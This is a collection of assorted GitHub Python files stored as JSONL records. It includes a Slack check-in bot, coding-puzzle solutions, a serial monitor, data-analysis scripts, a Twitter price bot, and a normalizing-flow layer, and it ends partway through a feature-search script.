slack_password = self.driver.find_element_by_xpath('//*[@id=\"password\"]')\n slack_password.send_keys(SLACK_PASSWORD)\n\n login_button = self.driver.find_element_by_xpath('//*[@id=\"signin_btn\"]')\n login_button.click()\n\n sleep(2)\n\n def find_thread(self, text1=\"\", text2=\"\"):\n checkin_done = False\n\n while not checkin_done:\n\n slack_messages = self.driver.find_elements_by_css_selector(\n \".c-message_kit__gutter\"\n )\n\n slack_checkin_to_send = [\n message\n for message in slack_messages\n if \"Devs check-in\" in message.text or \"Coaches check-in\" in message.text\n ]\n\n slack_checkin_to_send.reverse()\n\n if (\n CHECKIN_TIME[\"MORNING\"][\"start\"][0:2].lstrip(\"0\")\n in slack_checkin_to_send[0].text\n ):\n hover = ActionChains(self.driver).move_to_element(\n slack_checkin_to_send[0]\n )\n hover.perform()\n thread_button = self.driver.find_element_by_xpath(\n \"/html/body/div[2]/div/div[2]/div[3]/div/div[2]/div[1]/div/div[2]/div/div[2]/div[1]/div/div/div[10]/div/div/div/div[3]/div/button[3]\"\n )\n thread_button.click()\n sleep(2)\n self.write_checkin(text1, text2)\n sleep(1)\n\n # silence thread notifications\n hover = ActionChains(self.driver).move_to_element(\n slack_checkin_to_send[0]\n )\n hover.perform()\n option_button = self.driver.find_element_by_css_selector(\n \".c-message_actions__button:last-child\"\n )\n option_button.click()\n silence_button = self.driver.find_element_by_css_selector(\n \".c-menu__items > div:first-child\"\n )\n silence_button.click()\n checkin_done = True\n\n elif (\n CHECKIN_TIME[\"EVENING\"][\"start\"][0:2].lstrip(\"0\")\n in slack_checkin_to_send[0].text\n ):\n hover = ActionChains(self.driver).move_to_element(\n slack_checkin_to_send[0]\n )\n hover.perform()\n thread_button = self.driver.find_element_by_css_selector(\n \".c-message_actions__button:nth-child(2)\"\n )\n thread_button.click()\n sleep(2)\n self.write_checkin(text1, text2)\n sleep(1)\n\n # silence thread notifications\n hover = ActionChains(self.driver).move_to_element(\n slack_checkin_to_send[0]\n )\n hover.perform()\n option_button = self.driver.find_element_by_css_selector(\n \".c-message_actions__button:last-child\"\n )\n option_button.click()\n silence_button = self.driver.find_element_by_css_selector(\n \".c-menu__items > div:first-child\"\n )\n silence_button.click()\n checkin_done = True\n\n else:\n CLEAR()\n print(\"Check-in não encontrado\\nTentando novamente em 20 segundos...\")\n sleep(20)\n\n\n## /html/body/div[2]/div/div[2]/div[5]/div/div/div[2]/div/div[2]/div/div[2]/div[1]/div/div/div[9]/div/div[1]/div/div/div[1]/div/div[1]/p\n## /html/body/div[2]/div/div[2]/div[5]/div/div/div[2]/div/div[2]/div/div[2]/div[1]/div/div/div[12]/div/div[1]/div/div/div[1]/div/div[1]/p\n","repo_name":"christiansmmc/slack-checkin-bot","sub_path":"core/slack_bot.py","file_name":"slack_bot.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"20704070017","text":"# https://leetcode.com/problems/divide-two-integers/\n\nclass Solution:\n def divide(self, dividend: int, divisor: int) -> int:\n sign = 1\n if (dividend < 0 and divisor > 0) or (dividend > 0 and divisor < 0): \n sign = -1\n\n divisor = abs(divisor )\n dividend = abs(dividend)\n\n # imagine dividend == 113 and divisor == 17\n # call stack of dbl(17, 1):\n # dbl(17, 1)\n # dbl(34, 2)\n # dbl(68, 4)\n # return sum = 0 + 68 && count = 4\n # return sum = 68 + 34 == 102 && count = 4 + 2 == 6\n # since 102 + 17 > 113 sum remains 102\n # return count == 6 as result which means floor(113 / 6) == 17\n \n def dbl(num, cnt):\n if num > dividend:\n return 0, 0\n \n s, c = dbl(num + num, cnt + cnt)\n \n if s + num <= dividend:\n s += num\n c += cnt\n \n return s, c\n\n dividend = abs(dividend)\n divisor = abs(divisor)\n \n # do the work\n _, res = dbl(divisor, 1)\n \n # fix sign\n res = res if sign == 1 else -res\n \n # clamp result\n mx = ( 1 << 31) - 1 \n mn = (-1 << 31) + 1\n \n if res > 1 << 31 - 1: \n return (1 << 31) - 1\n \n if res < -1 << 31: \n return (-1 << 31) + 1\n \n return res\n ","repo_name":"dnsvee/Solutions_to_LeetCode_Problems","sub_path":"LeetCode_29_Divide_Two_Integers.py","file_name":"LeetCode_29_Divide_Two_Integers.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3548850731","text":"import threading\r\nimport time\r\nimport util\r\nfrom filter.manager import FilterManager\r\nimport logger\r\n\r\nlog = logger.get()\r\n\r\n\r\nclass _WriteFileArgs(object):\r\n def __init__(self, view, regions):\r\n self.view = view\r\n self.regions = regions\r\n\r\n\r\nclass ViewWriter(object):\r\n def __init__(self, view):\r\n self._view_lock = threading.Lock()\r\n self._newline = True\r\n self.view = view\r\n\r\n def set_view(self, view):\r\n with self._view_lock:\r\n self.view = view\r\n self._newline = True\r\n\r\n def write(self, text, timestamp=\"\"):\r\n if not self.view.is_valid():\r\n return\r\n # If timestamps are enabled, append a timestamp to the start of each line\r\n if timestamp:\r\n # Newline was stripped from the end of the last write, needs to be\r\n # added to the beginning of this write\r\n if self._newline:\r\n text = timestamp + text\r\n self._newline = False\r\n # Count the number of newlines in the text to add a timestamp to\r\n # if the text ends with a newline, do not add a timestamp to the next\r\n # line and instead add it with the next text received\r\n newlines = text.count(\"\\n\")\r\n if text[-1] == '\\n':\r\n newlines -= 1\r\n self._newline = True\r\n text = text.replace(\"\\n\", \"\\n%s\" % timestamp, newlines)\r\n\r\n with self._view_lock:\r\n util.main_thread(self.view.run_command, \"serial_monitor_write\", {\"text\": text})\r\n\r\n\r\nclass SerialMonitor(threading.Thread):\r\n \"\"\"\r\n Thread that controls a stream's read, write, open, close, etc. and outputs the serial info to a sublime view\r\n :type stream: stream.AbstractStream\r\n \"\"\"\r\n def __init__(self, stream, view, window):\r\n super(SerialMonitor, self).__init__(name=\"Thread-{}\".format(stream.name))\r\n self.stream = stream\r\n self.view = view\r\n self.window = window\r\n self.lock = threading.Lock()\r\n self.running = False\r\n self.timestamp_logging = False\r\n self.line_endings = \"CRLF\"\r\n self.local_echo = False\r\n self._text_to_write = []\r\n self._file_to_write = []\r\n self._text_lock = threading.Lock()\r\n self._file_lock = threading.Lock()\r\n self._filter_manager = FilterManager()\r\n self._newline = True\r\n self._view_writer = ViewWriter(view)\r\n\r\n self._new_configuration = None\r\n\r\n def write_line(self, text):\r\n with self._text_lock:\r\n self._text_to_write.append(text)\r\n\r\n def write_file(self, view, selection):\r\n file_args = _WriteFileArgs(view, selection)\r\n with self._file_lock:\r\n self._file_to_write.append(file_args)\r\n\r\n def disconnect(self):\r\n self.running = False\r\n\r\n def enable_timestamps(self, enabled):\r\n self.timestamp_logging = enabled\r\n\r\n def set_output_view(self, view):\r\n self._view_writer.set_view(view)\r\n\r\n def set_line_endings(self, line_endings):\r\n if line_endings.upper() in [\"CR\", \"LF\", \"CRLF\"]:\r\n self.line_endings = line_endings.upper()\r\n return True\r\n print(\"Unknown line ending: %s\" % line_endings)\r\n return False\r\n\r\n def set_local_echo(self, enabled):\r\n self.local_echo = enabled\r\n\r\n def add_filter(self, filtering_file, output_view):\r\n self._filter_manager.add_filter(filtering_file, output_view)\r\n\r\n def remove_filter(self, filtering_file):\r\n self._filter_manager.remove_filter(filtering_file)\r\n\r\n def filters(self):\r\n return self._filter_manager.filters()\r\n\r\n def get_config(self):\r\n \"\"\"\r\n :rtype: stream.SerialConfig\r\n \"\"\"\r\n return self.stream.config\r\n\r\n def reconfigure_port(self, config):\r\n self._new_configuration = config\r\n\r\n def _write_to_output(self, text):\r\n if not text:\r\n return\r\n text = util.serial_line_endings_to_sublime(text, self.line_endings)\r\n\r\n timestamp = \"\"\r\n if self.timestamp_logging:\r\n t = time.time()\r\n timestamp = time.strftime(\"[%m-%d-%y %H:%M:%S.\", time.localtime(t)) + \"%03d] \" % (int(t * 1000) % 1000)\r\n\r\n filter_thread = threading.Thread(target=self._filter_manager.apply_filters, args=(text, timestamp))\r\n filter_thread.start()\r\n self._view_writer.write(text, timestamp)\r\n\r\n def _read_stream(self):\r\n serial_input = self.stream.read(1024)\r\n if serial_input:\r\n self._write_to_output(serial_input.decode(encoding=\"ascii\", errors=\"replace\"))\r\n\r\n def _write_text(self):\r\n with self._text_lock:\r\n text_list = self._text_to_write[:]\r\n self._text_to_write = []\r\n\r\n # Write any text in the queue to the serial port\r\n while text_list:\r\n text = text_list.pop(0)\r\n\r\n if self.local_echo:\r\n self._write_to_output(text)\r\n\r\n text = util.sublime_line_endings_to_serial(text, self.line_endings)\r\n self.stream.write(bytes(text, encoding=\"ascii\"))\r\n self._read_stream()\r\n\r\n def _write_file(self):\r\n with self._file_lock:\r\n # Write any files in the queue to the serial port\r\n while self._file_to_write:\r\n output_file = self._file_to_write.pop(0)\r\n for region in output_file.regions:\r\n text = output_file.view.substr(region)\r\n lines = text.splitlines(True)\r\n if not lines[-1].endswith(\"\\n\"):\r\n lines[-1] += \"\\n\"\r\n for line in lines:\r\n if self.local_echo:\r\n self._write_to_output(line)\r\n\r\n line = util.sublime_line_endings_to_serial(line, self.line_endings)\r\n self.stream.write(bytes(line, encoding=\"ascii\"))\r\n self._read_stream()\r\n\r\n def run(self):\r\n self.running = True\r\n try:\r\n self.stream.open()\r\n while self.running and self.view.is_valid():\r\n self._read_stream()\r\n self._write_text()\r\n self._write_file()\r\n\r\n if self._new_configuration:\r\n self.stream.reconfigure(self._new_configuration)\r\n self._new_configuration = None\r\n except Exception as e:\r\n self._write_to_output(\"\\nError occurred on port {0}: {1}\".format(self.stream.comport, str(e)))\r\n log.exception(e)\r\n finally:\r\n log.info(\"Disconnecting from {}\".format(self.stream.comport))\r\n # Thread terminated, write to buffer if still valid and close the serial port\r\n self._write_to_output(\"\\nDisconnected from {0}\".format(self.stream.comport))\r\n self._filter_manager.port_closed(self.stream.comport)\r\n self.stream.close()\r\n self.running = False\r\n util.main_thread(self.window.run_command, \"serial_monitor\", {\"serial_command\": \"_port_closed\",\r\n \"comport\": self.stream.comport})\r\n","repo_name":"ThomasGerstenberg/serial_monitor","sub_path":"serial_monitor_thread.py","file_name":"serial_monitor_thread.py","file_ext":"py","file_size_in_byte":7228,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"36783335198","text":"import pandas as pd\n\nin_filename = \"raw_data/covid_cnty_cases_all_methods.csv\"\nout_filename = \"task2_data/top_10_pop_all_step_ahead.csv\"\n\nconfig_filename = \"task2_data/top_10_pop_fips.txt\"\ncounties = open(config_filename, \"r\").read().split(\",\")\nstep_ahead = [\"1-step_ahead\", \"2-step_ahead\", \"3-step_ahead\", \"4-step_ahead\"]\n\nfilter_str = \"cnty in @counties and step_ahead in @step_ahead\"\n\n########################################################################\n\nprint(\"counties:\", counties)\nprint(\"step ahead:\", step_ahead)\n\nraw_df = pd.read_csv(in_filename, dtype={\"cnty\": \"str\"})\nprint(\"Total rows:\", len(raw_df))\n\nfinal_df = raw_df.query(filter_str)\\\n .drop_duplicates()\\\n .drop('fct_std', axis=1)\\\n .sort_values(by=['cnty', 'method', 'horizon', 'step_ahead'])\n\nprint(final_df)\n\nwith open(out_filename, \"w\", newline='') as out_file:\n final_df.to_csv(path_or_buf=out_file, sep=\",\", index=False)","repo_name":"adham-ibrahim7/Biocomplexity-Institute-Internship-2223","sub_path":"filter_raw_data_pd.py","file_name":"filter_raw_data_pd.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14694712235","text":"\"\"\"\nThis problem was asked by Microsoft.\nGiven a string and a pattern, find the starting indices of all occurrences of the pattern in the string. For example, given the string \"abracadabra\" and the pattern \"abr\", you should return [0, 7].\n\"\"\"\n\n\ndef findOccurenceIdx(string, pattern):\n occurences = []\n\n for i in range(len(string) - len(pattern) + 1):\n\n if string[i] == pattern[0]:\n\n windowStr = ''\n for j in range(i, i+len(pattern)):\n windowStr += string[j]\n\n if windowStr == pattern:\n occurences.append(i)\n\n return occurences\n\n\nprint(\"Occurences at: {}\".format(findOccurenceIdx('abracadabra', 'abr')))\n","repo_name":"troywsmith/pygo","sub_path":"practice/DCP/211.py","file_name":"211.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70576283307","text":"from typing import List\n\n\nclass Solution:\n def findLongestChain(self, pairs: List[List[int]]) -> int:\n pairs.sort(key=lambda x: (x[1], x[0]))\n\n prev = pairs[0]\n res = 1\n\n for curr in pairs[1:]:\n if curr[0] > prev[1]:\n res += 1\n prev = curr\n\n return res\n","repo_name":"lymchgmk/Algorithm-Problem-Solving","sub_path":"LeetCode/Python/646. Maximum Length of Pair Chain /Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72829616427","text":"import re\nfrom embedding_method.mapper import MemFetcher\nimport numpy as np\n\nclass QueryToLaser:\n def __init__(self,base_path,embedder,max_length):\n self.base_path = base_path\n self.max_length = max_length\n self.embedder = embedder\n self.embedding_method = \"laser\"\n self.wordmmap = MemFetcher(self.base_path + self.embedding_method + \"/word2emb.json\",self.base_path + self.embedding_method + \"/word_emb.jsonl\")\n\n def get_embedding(self, query):\n query_text = query[\"context\"]\n q_emb = []\n query_text = self.clean(query_text)\n for word in query_text.split(\" \"):\n if word != '':\n try:\n emb = self.wordmmap(word)\n\n q_emb.append(emb)\n except:\n # print(\"ofv: \",word)\n emb = self.embedder(word)[0]\n q_emb.append(emb)\n\n assert emb.shape == (1024,), \"got: {}\".format(emb.shape)\n\n return q_emb,query_text\n\n\n def clean(self,text):\n text = re.sub(\"[/$&+,:;=?@#|'<>.\\\"^*()%!-]\", ' ', text)\n #text = text.lower()\n return text\n\n def padding(self,query,max_len):\n while len(query) < max_len:\n query.append(np.zeros(1024))\n\n return query[:self.max_length]","repo_name":"Lyngsoe/AutomaticQueryReformulation","sub_path":"legacy/query_to_laser.py","file_name":"query_to_laser.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41272625087","text":"import argparse\nimport pytest\nimport collections\n\n\ndef find_combinations(index, value, combinations, data):\n\n for idx, num in enumerate(data[:index]):\n\n if value - num <= 3:\n combinations[value] += combinations[num]\n\n if value not in combinations:\n combinations[value] = 1\n\n\ndef compute(data):\n\n data_i = sorted([int(i) for i in data.splitlines()])\n data_i.insert(0, 0)\n combinations = collections.defaultdict(int, {0: 1})\n\n for idx, num in enumerate(data_i):\n\n find_combinations(idx, num, combinations, data_i)\n\n return combinations[data_i[-1]]\n\n\nINPUT = \"\"\"\\\n16\n10\n15\n5\n1\n11\n7\n19\n6\n12\n4\n\"\"\"\n\nINPUT_2 = \"\"\"\\\n28\n33\n18\n42\n31\n14\n46\n20\n48\n47\n24\n23\n49\n45\n19\n38\n39\n11\n1\n32\n25\n35\n8\n17\n7\n9\n4\n2\n34\n10\n3\n\"\"\"\n\n\n@pytest.mark.parametrize(\n (\"test_input,expected\"), [(INPUT, 8), (INPUT_2, 19208)]\n) # noqa: E501\ndef test(test_input, expected):\n assert compute(test_input) == expected\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"file\")\n args = parser.parse_args()\n\n with open(args.file, \"r\") as f:\n print(compute(f.read()))\n\n\nif __name__ == \"__main__\":\n exit(main())\n","repo_name":"Steven-N/adventofcode2020","sub_path":"day10/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44226963477","text":"import datetime\n\nimport pytest\nfrom eth_utils import to_wei\nfrom web3.contract import Contract\n\n\n@pytest.fixture\ndef presale_freeze_ends_at() -> int:\n \"\"\"How long presale funds stay frozen until refund.\"\"\"\n return int(datetime.datetime(2017, 1, 1).timestamp())\n\n\n@pytest.fixture\ndef presale_fund_collector(chain, presale_freeze_ends_at, team_multisig) -> Contract:\n \"\"\"In actual ICO, the price is doubled (for testing purposes).\"\"\"\n args = [\n team_multisig,\n presale_freeze_ends_at,\n to_wei(1, \"ether\")\n ]\n tx = {\n \"from\": team_multisig,\n }\n presale_fund_collector, hash = chain.provider.deploy_contract('PresaleFundCollector', deploy_args=args, deploy_transaction=tx)\n return presale_fund_collector\n\n\n@pytest.fixture\ndef presale_crowdsale(chain, presale_fund_collector, uncapped_flatprice, team_multisig):\n \"\"\"ICO associated with the presale where funds will be moved to a presale.\"\"\"\n presale_fund_collector.transact({\"from\": team_multisig}).setCrowdsale(uncapped_flatprice.address)\n return uncapped_flatprice\n","repo_name":"mysteriumnetwork/contracts","sub_path":"tests/fixtures/presale.py","file_name":"presale.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"9289910502","text":"import requests\nimport csv\nimport os\nfrom datetime import datetime\nfrom collections import defaultdict\nimport json\nimport tqdm\n\n\n\n\ndef make_json():\n by_ltla = defaultdict(list)\n by_lineage = defaultdict(list)\n with open(\"10_lineage.csv\", \"r\") as csvfile:\n dataset = []\n reader = csv.reader(csvfile, delimiter=\",\")\n next(reader)\n for i, row in tqdm.tqdm(enumerate(reader)):\n j, lad, date, mean, upper, lower, param, lineage = row\n\n if mean !=\"\":\n mean = round(float(mean),3)\n upper = round(float(upper),3)\n lower = round(float(lower),3)\n\n item = {\n 'date':date,\n 'parameter': param,\n 'location': lad,\n 'mean': mean,\n 'upper': upper,\n 'lower': lower,\n 'lineage' : lineage\n }\n by_ltla[lad].append(item)\n by_lineage[lineage].append(item)\n for k,v in tqdm.tqdm(by_ltla.items()):\n with open(f'../public/data/ltla/{k}.json', 'w') as outfile:\n json.dump({'data':v}, outfile)\n for k,v in tqdm.tqdm(by_lineage.items()):\n with open(f'../public/data/lineage/{k}.json', 'w') as outfile:\n json.dump({'data':v}, outfile)\n with open(f'../src/assets/lists.json', 'w') as outfile:\n json.dump({'ltlas':list(by_ltla.keys()),'lineages':list(by_lineage.keys() )}, outfile)\n \n\n\n\n# new\nif __name__ == \"__main__\":\n make_json()\n\n","repo_name":"hawkingbeck/covince","sub_path":"populate/make_json.py","file_name":"make_json.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"24135754132","text":"# for循环的优化策略:\n# 1 尽量不要在循环内做不必要的计算\n# 2 尽量使用局部变量,查询较快\n# 3 连接多个字符串,尽量用join不要用+\n# 4 列表的插入和删除尽量在末尾进行\n\nimport time\n\ns1 = time.time()\nfor i in range(1000):\n list1 = []\n for j in range(10000):\n list1.append(i*5 + j*10)\ne1 = time.time()\nprint(\"方法一耗时:{0} 秒\".format(e1-s1))\n\ns2 = time.time()\nfor i in range(1000):\n list2 = []\n c = i * 5\n for j in range(10000):\n list2.append(c + j*10)\ne2 = time.time()\nprint(\"方法二耗时:{0} 秒\".format(e2-s2))","repo_name":"taomee517/python-basic","sub_path":"basic/control_statement/for_improve.py","file_name":"for_improve.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75148821866","text":"import tweepy\nimport requests\nimport json \nimport time\nimport config\n\nauth_handler = tweepy.OAuthHandler(consumer_key=config.API_KEY,consumer_secret=config.API_SECRET)\nauth_handler.set_access_token(config.ACCESS_TOKEN, config.ACCESS_SECRET)\n\napi = tweepy.API(auth_handler, wait_on_rate_limit=True)\n\nprint('Logged in ')\n\nwhile True:\n bitcoinprice = requests.get('https://api.coingecko.com/api/v3/simple/price?ids=bitcoin&vs_currencies=usd')\n price = bitcoinprice.json()\n btcusd = price['bitcoin']['usd']\n print(btcusd)\n\n message = 'The current BTC Price is : ' + str(btcusd) + 'USD, Buy #Bitcoin now'\n api.update_status(message)\n print('Tweet was posted successfully')\n time.sleep(300)\n\n","repo_name":"Gobindapaull/Python-Concepts-and-Fundamentals","sub_path":"twitter-crypto-price.py","file_name":"twitter-crypto-price.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10297926225","text":"'''\nIterables and Iterators\nLink: https://www.hackerrank.com/challenges/iterables-and-iterators/problem\n'''\n\n# Enter your code here. Read input from STDIN. Print output to STDOUT\n\nfrom itertools import combinations\n\nn = int(input().rstrip())\nletters = input().rstrip().split()\nk = int(input().rstrip())\n\nletter_to_find = \"a\"\ncount = 0\n\nall_combinations = list(combinations(\"\".join(letters), k))\nfor combination in all_combinations:\n if letter_to_find in combination: count += 1\n\nprint(round(count/len(all_combinations), 3))","repo_name":"ashababnoor/hackerrank-solutions","sub_path":"python/itertools/iterables_and_iterators.py","file_name":"iterables_and_iterators.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11554602612","text":"from .db import db\nfrom sqlalchemy import DateTime\nimport datetime\n\nclass Image(db.Model):\n __tablename__ = 'images'\n\n id = db.Column(db.Integer, primary_key=True)\n url = db.Column(db.String(500), nullable=False)\n created_at = db.Column(DateTime, default=datetime.datetime.utcnow)\n updated_at = db.Column(DateTime, default=datetime.datetime.utcnow)\n \n spotId = db.Column(db.Integer, db.ForeignKey('spots.id'))\n spots = db.relationship(\"Spot\", back_populates=\"images\")\n\n def to_dict(self):\n return {\n \"id\": self.id,\n \"spotId\": self.spotId,\n \"url\": self.url,\n # \"comments\": [comment.to_dict() for comment in self.comments],\n }","repo_name":"Rayn89/scare-bnb","sub_path":"app/models/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19125666946","text":"from torch import nn\nimport torch\nimport numpy as np\nfrom normflowpy.base_flow import UnconditionalBaseFlowLayer\n\n\nclass BatchNorm(UnconditionalBaseFlowLayer):\n def __init__(self, num_features, momentum=0.1, eps=1.0e-5, affine=True):\n super(BatchNorm, self).__init__()\n\n self.num_features = num_features\n self.eps = eps\n self.momentum = momentum\n\n self.dimensions = [num_features]\n # self.dimensions[1] = num_features[0]\n log_gamma = torch.zeros(self.dimensions)\n beta = torch.zeros(self.dimensions)\n if affine:\n self.register_parameter('log_gamma', nn.Parameter(log_gamma))\n self.register_parameter('beta', nn.Parameter(beta))\n else:\n self.register_buffer('log_gamma', log_gamma)\n self.register_buffer('beta', beta)\n\n self.register_buffer('running_mean', torch.zeros(self.dimensions))\n self.register_buffer('running_var', torch.ones(self.dimensions))\n self.register_buffer('batch_mean', torch.zeros(self.dimensions))\n self.register_buffer('batch_var', torch.ones(self.dimensions))\n\n def forward(self, x):\n if self.training:\n x_reshape = x.view(x.size(0), self.num_features)\n x_mean = torch.mean(x_reshape, dim=[0], keepdim=True)\n x_var = torch.mean((x_reshape - x_mean).pow(2), dim=[0], keepdim=True) + self.eps\n self.batch_mean.data.copy_(x_mean.view(self.dimensions))\n self.batch_var.data.copy_(x_var.view(self.dimensions))\n\n self.running_mean.mul_(1.0 - self.momentum)\n self.running_var.mul_(1.0 - self.momentum)\n self.running_mean.add_(self.batch_mean.detach() * self.momentum)\n self.running_var.add_(self.batch_var.detach() * self.momentum)\n\n mean, var = self.batch_mean, self.batch_var\n else:\n mean, var = self.running_mean, self.running_var\n\n x = (x - mean) / torch.sqrt(var)\n x = x * torch.exp(self.log_gamma) + self.beta\n\n num_pixels = np.prod(x.size()) // (x.size(0) * x.size(1))\n log_det = self.log_gamma - 0.5 * torch.log(var)\n log_det_jacob = torch.sum(log_det) * num_pixels\n\n return x, log_det_jacob\n\n def backward(self, x):\n if self.training:\n mean, var = self.batch_mean, self.batch_var\n else:\n mean, var = self.running_mean, self.running_var\n\n x = (x - self.beta) / torch.exp(self.log_gamma)\n x = x * torch.sqrt(var) + mean\n\n num_pixels = np.prod(x.size()) // (x.size(0) * x.size(1))\n log_det = -self.log_gamma + 0.5 * torch.log(var)\n log_det_jacob = torch.sum(log_det) * num_pixels\n\n return x, log_det_jacob\n","repo_name":"haihabi/NormFlowPy","sub_path":"normflowpy/flows/flow_modules/batch_normalization.py","file_name":"batch_normalization.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37871155126","text":"# Task 2\nimport requests\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv('.env')\n\napi = os.getenv('APIkey', None)\n\n\ndef get_weather(url, params):\n weather = requests.get(url, params=params)\n temp = weather.json()[\"main\"]\n temp_now = temp['temp']\n return temp_now\n\n\nurl = 'https://api.openweathermap.org/data/2.5/weather'\ncity = input('Введите название города: ')\np = {\n 'appid': api,\n 'q': city,\n 'units': 'metric',\n 'lang': 'ru'\n}\n\nprint(f'Температура в городе {city} равна {get_weather(url, p)} градусов цельсий')\n","repo_name":"AlexKomogortsev/Parsing","sub_path":"Lesson_1_2.py","file_name":"Lesson_1_2.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10422489273","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 14 21:08:26 2017\n\n@author: 5eo1ab\n\"\"\"\n\nimport pandas as pd\nfrom pandas import DataFrame as df\nimport numpy as np\nimport mysql.connector\n\n## Connect Database\ncnx = mysql.connector.connect(\n user = 'seo',\n password = '0000',\n host = '192.168.0.4',\n database = 'bropy')\nprint(\"Success Connection.\")\n\n## Load column names\nimport json\nfpath = 'C:/Users/SERVER1/bro.py/dataset_competition/'\ndic_t_cols = json.load(open(fpath+'colnames.json'))\n\n## Load data to DataFrame and set dictioary\ndic_t_df = {}\nfor t, cols in dic_t_cols.items() :\n cursor = cnx.cursor()\n query = \"SELECT {} FROM {}\".format(\", \".join(cols), t)\n cursor.execute(query)\n dic_t_df[t] = df(cursor.fetchall(), columns=cols)\n cursor.close()\n \n#dic_t_df['G_IDX_CLOSE'].head()\n#dic_t_df['MATERIALS'].head()\n\"\"\"\n############################\n## Export to CSV format\n############################\nnationals = ['KR_INDEX', 'US_INDEX', 'CN_INDEX', 'JP_INDEX', 'DE_INDEX']\n\nex_dir = 'C:/Users/SERVER1/bro.py/dataset_competition/EXPORTED_CSV/'\nfor n in nationals :\n dic_t_df[n].to_csv(dirs+\"{}.csv\".format(n), index=False)\n\"\"\"\n\n\n############################\n## Get pearson cor.\n############################\nfrom scipy.stats import pearsonr\ndef has_missing(ar) :\n if False in list(ar[:2]==pd.Series([0,0])) :\n return False\n return True\ndef get_idx_missing(ar) :\n if has_missing(ar) is False :\n return 0\n return ar[ar>0].index[0]-1\n\nfpath = 'C:/Users/SERVER1/bro.py/dataset_competition/'\ndic_n_idx = json.load(open(fpath+'nationals.json'))\nnationals = list(dic_n_idx.keys())\n\ndic_n_corr = {}\nfor n in nationals :\n cols = list(dic_t_df[n].columns.values)[1:]\n corr_li = []\n tmp_n_df = dic_t_df[n][dic_t_df[n]['TimeLog']>=dic_t_df['G_IDX_CLOSE']['TimeLog'][0]]\n tmp_n_df = tmp_n_df.reset_index(drop=True)\n for c0 in cols :\n tmp_li = [dic_n_idx[n], c0]\n s_idx = get_idx_missing(tmp_n_df[c0])\n corr, p_v = pearsonr(dic_t_df['G_IDX_CLOSE'][dic_n_idx[n]][s_idx:],\n tmp_n_df[c0][s_idx:])\n corr_li.append(tmp_li+[corr, p_v])\n for c0 in cols[:-1] :\n c0_idx = get_idx_missing(dic_t_df[n][c0])\n for c1 in cols[cols.index(c0)+1:] :\n #print(c0,c1)\n tmp_li = [c0, c1]\n if c0_idx > get_idx_missing(dic_t_df[n][c1]):\n s_idx = get_idx_missing(dic_t_df[n][c1])\n else :\n s_idx = c0_idx\n corr, p_v = pearsonr(dic_t_df[n][c0][s_idx:],dic_t_df[n][c1][s_idx:])\n corr_li.append(tmp_li+[corr, p_v])\n dic_n_corr[n] = df(corr_li, columns=['c0', 'c1', 'corr', 'p-value'])\n print(n)\n\n## Export to CSV format\nex_dir = 'C:/Users/SERVER1/bro.py/dataset_competition/EXPORTED_CSV/'\nfor n in nationals :\n dic_n_corr[n].to_csv(ex_dir+\"{}.csv\".format(\"corr_{}\".format(n)), index=False)\n","repo_name":"5eo1ab/competition-index-prediction","sub_path":"dataset_competition/Script_Code/TMP_get_dic_t_df.py","file_name":"TMP_get_dic_t_df.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40623062787","text":"import numpy as np\nfrom makeGraph import featGraph\nfrom training import sampleTraining\n\nclass featureSearch:\n def __init__(self, data):\n self.data = data\n\n def leave_one_out_CV(self, X, Y, features, k, m):\n correct = 0\n current_features = list(features)\n for i in range(m):\n distance = 0\n if k == None:\n distance = 0\n else:\n distance = (X[i, k] - X[:, k])**2\n for feature in current_features:\n distance += (X[i, feature] - X[:, feature])**2\n mini = np.where(distance == np.min(distance[np.nonzero(distance)]))\n if Y[mini[0][0]] == Y[i]:\n correct += 1\n return correct/m\n\n def backward_feature_search(self):\n Y = np.copy(self.data[:, 0]) # Classifications\n X = np.delete(self.data, 0, 1) # Features\n (m, n) = X.shape\n current_set = {s for s in range(n)}\n accuracies = []\n correspond = {}\n for i in range(n, 0, 